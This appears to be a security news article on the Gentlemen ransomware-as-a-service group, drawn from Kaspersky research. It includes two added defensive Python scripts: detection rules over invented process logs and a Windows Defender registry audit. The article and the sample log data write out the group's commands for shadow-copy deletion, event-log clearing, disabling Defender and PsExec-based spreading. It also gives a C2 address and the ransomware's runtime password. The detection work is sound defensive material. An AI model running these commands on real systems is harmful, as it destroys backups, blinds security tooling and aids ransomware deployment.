
The Gentlemen Ransomware Gang Exposes Advanced Tactics


In the first half of 2026, The Gentlemen ranks among the top 10 ransomware actors by the number of victims announced on its data leak site (DLS).

What The Gentlemen are doing and where they hit

The Gentlemen is a ransomware-as-a-service (RaaS) operation that ramped up activity at the start of 2026; Kaspersky has tracked it since February 2026. Targets span manufacturing, IT services, healthcare, financial services, construction, and logistics, with the heaviest observed intrusion activity in Brazil, China, Indonesia, Taiwan, and Thailand. Kaspersky attributes the observed activity to The Gentlemen with high confidence, based on the recurring use of the group name, associated email addresses, and a single data leak site referenced inside both the binaries and the ransom notes.

Initial access, reconnaissance and lateral movement

The Gentlemen and its affiliates enter networks by exploiting internet-exposed services and by using stolen or weak credentials. The group often targets internet-facing hardware VPNs and firewalls, and Kaspersky assesses that collaboration with other actors or initial access brokers is likely in some compromises. After initial access, The Gentlemen perform internal reconnaissance with tools including SharpADWS, NetScan, Advanced IP Scanner and Microsoft's netsh. SharpADWS is used for Active Directory enumeration; netsh is used to capture network traffic with commands such as netsh trace start capture=yes ..., and the resulting trace files are saved to administrative shares for later analysis in tools like Wireshark.

For lateral movement, the attackers copy the ransomware to the domain's NETLOGON share and use a customized PowerShell script, deploy_gpo.ps1, to push a Group Policy-based deployment across the domain. When GPO deployment is not feasible, PsExec is used; if PsExec is not present, the ransomware downloads it from https://live.sysinternals[.]com/PsExec.exe. The ransomware also enumerates domain computers using RSAT/PowerShell (falling back to NetServerEnum) and pings each host before attempting remote execution.

Custom tooling: a Go backdoor and Go ransomware with anti-analysis controls

Kaspersky observed a custom Go backdoor deployed a day before an attack. The implant collects the hostname, domain, system UUID (via the WMI query "SELECT UUID FROM Win32_ComputerSystemProduct") and local IP addresses, packs them into JSON, and opens a Yamux-multiplexed bidirectional TCP session to the C2 at 81.177.215[.]15:9443. It then dispatches on a single byte sent by the operator: 'c' executes a command through cmd.exe /c, and 's' turns the session into a SOCKS proxy.

The primary ransomware, in use since mid-2025, is also Go-based. It uses a hybrid encryption scheme (Curve25519 key agreement plus XChaCha20 for file content) and embeds the attacker's public key as Base64 (HvzC6Dq/siFthWSgE5ozZyQDu9cyxIoxb3NuRHI6pDM=). To hinder sandbox and automated analysis, the binary requires a runtime password, currently "CbdU8EgF"; without the correct password it exits. The Go builder exposes many command-line parameters, for example --gpo to deploy via Group Policy, --spread for PsExec-based lateral movement, and --wipe to overwrite free space. The binary also establishes persistence (a scheduled task named "UpdateUser" and a Run key named "GupdateS"), stops Hyper-V VMs before encryption, terminates backup and management processes, and deletes shadow copies and clears event logs (for example vssadmin.exe delete shadows /all /quiet and wevtutil.exe cl System).
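The intrusion chain described above (netsh trace capture, staging in NETLOGON, deploy_gpo.ps1, the PsExec download from live.sysinternals.com, the UpdateUser task, shadow-copy deletion and event-log clearing) maps cleanly onto process-creation telemetry. The following Python script is an added example written for this article, not code from the Kaspersky report or from the group's tooling: it runs a small rule set over constructed Security 4688 / Sysmon-style records, groups hits per host, scores each host by how many stages of the chain it shows, and surfaces the account whose activity spans several hosts. The host names, user names, paths and log lines are invented for illustration; only the command patterns come from the article.

```python
import re
from collections import defaultdict

# Constructed process-creation records (Security 4688 / Sysmon EID 1 style), flattened to
# "host|user|image|command_line". Hosts, users and paths are invented for this example;
# the command patterns mirror those described in the article.
SAMPLE_EVENTS = r"""
DC01|CORP\svc_backup|C:\Windows\System32\netsh.exe|netsh trace start capture=yes tracefile=\\DC01\ADMIN$\temp\net.etl
DC01|CORP\svc_backup|C:\Windows\System32\cmd.exe|cmd.exe /c copy C:\Users\Public\locker.exe \\corp.local\NETLOGON\locker.exe
DC01|CORP\svc_backup|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ep bypass -f \\corp.local\NETLOGON\deploy_gpo.ps1
FS02|CORP\svc_backup|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Invoke-WebRequest https://live.sysinternals.com/PsExec.exe -OutFile C:\Windows\Temp\PsExec.exe
FS02|CORP\svc_backup|C:\Windows\Temp\PsExec.exe|PsExec.exe \\WS11 -s -d C:\Windows\Temp\locker.exe
WS11|NT AUTHORITY\SYSTEM|C:\Windows\System32\schtasks.exe|schtasks /create /tn UpdateUser /tr C:\Windows\Temp\locker.exe /sc onlogon /ru SYSTEM
WS11|NT AUTHORITY\SYSTEM|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
WS11|NT AUTHORITY\SYSTEM|C:\Windows\System32\wevtutil.exe|wevtutil.exe cl System
WS11|CORP\alice|C:\Windows\System32\ping.exe|ping -n 1 intranet.corp.local
DEV07|CORP\bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-ADComputer -Filter *
"""

RULES = [
    # (stage, rule name, regex applied to the command line)
    ("recon", "netsh_trace_capture",
     r"(?i)\bnetsh(\.exe)?\s+trace\s+start\b.*\bcapture=yes\b"),
    ("staging", "netlogon_write",
     r"(?i)\b(copy|xcopy|move|robocopy)\b.*\\NETLOGON\\"),
    ("lateral", "deploy_gpo_script", r"(?i)\bdeploy_gpo\.ps1\b"),
    ("lateral", "psexec_download", r"(?i)live\.sysinternals\.com/PsExec\.exe"),
    ("lateral", "psexec_remote_exec", r"(?i)\bpsexec(64)?(\.exe)?\s+\\\\"),
    ("persistence", "schtask_updateuser",
     r'(?i)\bschtasks(\.exe)?\s+/create\b.*\s/tn\s+"?UpdateUser"?'),
    ("impact", "shadow_copy_delete",
     r"(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b.*\s/all\b"),
    ("impact", "eventlog_clear", r"(?i)\bwevtutil(\.exe)?\s+cl\s+\S+"),
]
COMPILED = [(stage, name, re.compile(pat)) for stage, name, pat in RULES]


def parse_events(text):
    """Turn the flattened records into dicts; a real pipeline would read EVTX/JSON instead."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, user, image, cmd = line.split("|", 3)
        events.append({"host": host, "user": user, "image": image, "cmd": cmd})
    return events


def match_event(event):
    """Return the (stage, rule) pairs whose regex matches this event's command line."""
    return [(stage, name) for stage, name, rx in COMPILED if rx.search(event["cmd"])]


def analyse(text):
    """Group rule hits by host so the chain can be read per machine."""
    report = defaultdict(lambda: {"stages": set(), "hits": []})
    for ev in parse_events(text):
        for stage, name in match_event(ev):
            report[ev["host"]]["stages"].add(stage)
            report[ev["host"]]["hits"].append((name, ev["user"], ev["cmd"]))
    return dict(report)


def severity(stages):
    """Escalate when several distinct stages of the chain appear on the same host."""
    if len(stages) >= 3:
        return "high"
    return "medium" if len(stages) == 2 else "low"


def pivot_users(report):
    """Accounts whose matched activity spans more than one host: the credential being reused."""
    hosts_by_user = defaultdict(set)
    for host, info in report.items():
        for _rule, user, _cmd in info["hits"]:
            hosts_by_user[user].add(host)
    return {u: h for u, h in hosts_by_user.items() if len(h) > 1}


if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for host, info in sorted(result.items()):
        print(f"{host}: {severity(info['stages'])} {sorted(info['stages'])}")
        for rule, user, cmd in info["hits"]:
            print(f"    {rule:22} {user:22} {cmd[:70]}")
    print("credential reuse across hosts:", pivot_users(result))
```

Individually, several of these commands are legitimate administration (netsh trace, schtasks, even vssadmin), which is why the script scores by the number of distinct chain stages per host rather than alerting on a single hit; the cross-host view of svc_backup is the signal an analyst would chase first. The ping before remote execution is deliberately not a rule: it is far too common to be useful on its own.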

Tactics to disable defenses: BYOVD, drivers, registry edits and open tools

The Gentlemen use multiple techniques to neutralize security products. They employ the BYOVD approach, installing and abusing vulnerable third-party drivers to disable endpoint protection from kernel mode. Observed drivers include ProcessMonitorDriver.sys, wamsdk.sys, gamedriverx64.sys, biontdrv.sys (variants listed as biontdrv_wink.sys and biontdrv_winbs.sys), inpoutx64.sys, wsddprm.sys and havoc.sys. Open-source tools such as Windows Kernel Explorer and OpenArk64 have been used to intercept or remove security drivers. Simpler methods are also present: the group has been observed running kavrmvr.exe to uninstall Kaspersky products, editing the registry to disable Windows Defender by setting DisableAntiSpyware and several Real-Time Protection policy values to 1, and issuing PowerShell cmdlets such as Set-MpPreference -DisableRealtimeMonitoring $true -Force and Add-MpPreference -ExclusionPath 'C:\'.
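The registry edits and Defender cmdlets above leave a durable footprint in the Defender policy keys and in the exclusion list, which makes them easy to audit after the fact from a `reg export` of the affected hives. The script below is an added example, not code from the Kaspersky report: it parses a regedit-format export, flags the policy DWORDs that switch protection layers off when set to 1 (the article names DisableAntiSpyware and the Real-Time Protection values; the remaining value names are standard Defender policy settings), and flags exclusions that cover a whole drive such as the C:\ exclusion described above. The two exports are constructed for this example; the key paths and value names are the real Defender locations, the data values are invented.

```python
import re

# Constructed regedit exports standing in for `reg export` output from two hosts.
# Key paths and value names are the real Defender policy / exclusion locations;
# the data values are invented for this example.
TAMPERED_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\"=dword:00000000
"C:\\Program Files\\Backup"=dword:00000000
"""

CLEAN_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\Program Files\\Backup"=dword:00000000
"""

POLICY_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"
RTP_KEY = POLICY_ROOT + r"\Real-Time Protection"
EXCLUSION_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",  # Add-MpPreference
    POLICY_ROOT + r"\Exclusions\Paths",                                        # Group Policy
)
# Policy DWORDs that switch off a protection layer when set to 1.
WEAKENING_VALUES = {
    POLICY_ROOT: ("DisableAntiSpyware",),
    RTP_KEY: ("DisableRealtimeMonitoring", "DisableBehaviorMonitoring",
              "DisableOnAccessProtection", "DisableIOAVProtection",
              "DisableScanOnRealtimeEnable"),
}


def _unescape(s):
    """Undo .reg escaping: \\ -> \ and \" -> " (scanned left to right)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text):
    """Parse a regedit export into {key_path: {value_name: (type, data)}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "@" if name == "@" else _unescape(name.strip('"'))
        if data.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(data[6:], 16))
        elif data.startswith('"') and data.endswith('"'):
            keys[current][name] = ("REG_SZ", _unescape(data[1:-1]))
        else:
            keys[current][name] = ("RAW", data)  # hex(...) blobs etc. are kept verbatim
    return keys


def is_overbroad(path):
    """True for exclusions that cover a whole drive (C:\, C:\*) or everything (*)."""
    p = re.sub(r"(\\\*?)+$", "", path.strip())
    return p in ("", "*") or re.fullmatch(r"[A-Za-z]:", p) is not None


def audit(keys):
    """Return (finding, detail) pairs for disabled protection layers and whole-drive exclusions."""
    findings = []
    for key, names in WEAKENING_VALUES.items():
        values = keys.get(key, {})
        for name in names:
            typ, data = values.get(name, (None, None))
            if typ == "REG_DWORD" and data == 1:
                findings.append(("policy_disabled", key + "\\" + name))
    for key in EXCLUSION_KEYS:
        for path in keys.get(key, {}):
            if is_overbroad(path):
                findings.append(("overbroad_exclusion", path))
    return findings


if __name__ == "__main__":
    for label, export in (("tampered", TAMPERED_REG), ("clean", CLEAN_REG)):
        print(label, audit(parse_reg_export(export)))
```

Regedit writes exports as UTF-16LE with a byte-order mark, so a real file should be opened with `encoding="utf-16"` before it is handed to parse_reg_export. A hit on the Real-Time Protection values is also worth reading as a second finding: on hosts where Defender Tamper Protection is enabled, Set-MpPreference cannot turn those settings off, so their presence means Tamper Protection was off or had itself been defeated.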

C-based implants, different crypto and operational changes

Alongside the Go toolset, Kaspersky references a C-based ESXi locker and a new Windows-targeting C ransomware that is still in development and has been seen in a limited set of attacks. The C variant uses a different crypto stack (AES-256-GCM for file content, with a randomly generated key and IV encrypted by a hardcoded RSA public key), writes its ransom note from a decoded byte array into a file named !-READ-ME—-GEN-TLE-MEN-!.txt, and, unlike recent Go builds that used Tox for operator communications, directs victims to contact the operators by email. Several parameters in the C variant mirror the Go build (including a password gate and a --system option that creates a scheduled task named "TaskSystem" to run elevated), but many flags are not yet implemented; Kaspersky anticipates this variant will mature and be used more widely.

What this means for technologists, enterprise defenders, and procurement leaders

  • Technologists and security teams: monitor administrative shares and writes to NETLOGON, audit Group Policy, scheduled task and Run key changes (for example the "UpdateUser" and "TaskSystem" tasks and the "GupdateS" Run key), and watch for unusual netsh trace files saved to administrative shares.
  • Enterprise defenders and affected organizations: prioritize vulnerability management for internet-exposed VPNs and firewalls, rotate and protect privileged credentials, and block the vulnerable third-party drivers the group abuses (Microsoft's vulnerable driver blocklist is the starting point; check whether the drivers named above are already covered).
  • Procurement leaders: validate driver provenance for shipped hardware and require vendor attestation around driver vulnerabilities and update mechanisms before deployment.

Conclusion — The Gentlemen combine commodity techniques (credential abuse, PsExec) with custom Go tooling, a bespoke backdoor, and emerging C-based implants. They explicitly embed operational defenses—password gates, custom obfuscators, and multiple lateral mechanisms—into their toolchain. Kaspersky’s telemetry shows an active program of development and testing; whether the C variant matures into a broad-scale alternative to the Go builder is an open question that defenders and procurement teams should treat as urgent.

Original report